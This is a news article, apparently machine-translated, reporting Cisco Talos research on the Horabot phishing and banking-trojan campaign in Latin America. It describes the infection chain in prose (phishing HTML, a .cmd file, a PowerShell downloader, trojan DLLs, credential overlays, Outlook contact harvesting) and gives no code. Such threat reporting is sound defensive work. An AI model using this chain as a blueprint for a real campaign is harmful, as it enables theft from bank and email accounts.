Researchers have identified a previously unknown malware campaign in cyberspace involving botnet Horabot is aimed at Hispanic users in Latin America. The campaign has reportedly been in existence since at least November 2020, infecting users with a banking trojan and spamming tool.

Malicious software allows hackers to gain access to accounts gmail, Outlook, hot mail or Yahoo victims, steal mailbox data and two-factor authentication codes, and send phishing emails on behalf of victims.

New Operation Horabot discovered company analysts Cisco Taloswho believe that the threat comes from Brazil.

Delivery to the target device

The multi-stage chain of infection begins with a tax-related phishing email that contains HTML– an attachment purporting to be a payment receipt. By opening this HTML file, the victim gets to a page hosted on the server AWScontrolled by the attackers.

Malicious page hosted on AWS

When a victim clicks on a hyperlink on a page, the download of a RAR archive starts, which contains a batch file with a “.cmd” extension. This file activates PowerShell-script that downloads trojans DLL-files and a set of legitimate executable files with C2 servers intruders. The Trojans in turn download two more payloads from another C2 server. One is a PowerShell script for uploading files, and the other is a Horabot binary.

banking trojan

One of the DLLs in the downloaded ZIP, “jli.dll”, which is loaded by the executable “kinit.exe”, is a banking trojan written in Delphi. It collects information about the victim’s system (language, disk size, antivirus software, hostname, OS version, IP address), user credentials and activity data.

In addition, the Trojan provides its operators with remote access capabilities, such as performing file operations. The malware can also intercept keystrokes, take screenshots, and track mouse movement.

When a victim opens a banking application or its web version in a browser, the Trojan overlays a fake window over the authorization fields to trick the victim into entering sensitive data such as credentials or one-time codes, giving cybercriminals full access to the bank account.

Cisco explains that the trojan has several built-in anti-analysis mechanisms to prevent it from running in sandboxes or near debuggers.

The ZIP archive also contains an encrypted spam tool DLL called “_upyqta2_J.mdat” designed to steal credentials for popular webmail services such as Gmail, Hotmail, and Yahoo.

Once the credentials are compromised, the tool captures the victim’s email account, generates spam emails, and sends them to the contacts in the victim’s mailbox, spreading the infection randomly. This tool also has the ability to intercept keystrokes, take screenshots, and log mouse movements.

Horabot botnet

The main payload installed on the victim’s system during the considered campaign is Horabot. This is a PowerShell-based botnet that attacks Outlook mailboxes to steal contacts and send phishing emails with malicious HTML attachments.

The malware launches the Outlook application on the victim’s desktop to parse the address book and contacts from the contents of the mailbox. “After initialization, the Horabot script looks for Outlook data files from the victim’s profile folder,” explains Cisco. All e-mail addresses extracted by the malware are written to an .Outlook file, encrypted, and transmitted to attackers.

Finally, the malware creates an HTML file locally, fills it with content from an external resource, and sends phishing emails to all extracted recipients individually. And when the process of sending phishing emails ends, locally created files and folders are deleted to erase traces of program activity.

Although this Horabot campaign is mainly targeted at users in Mexico, Uruguay, Brazil, Venezuela, Argentina, Guatemala and Panama, this campaign can expand its presence in other markets at any time using phishing baits written in other languages.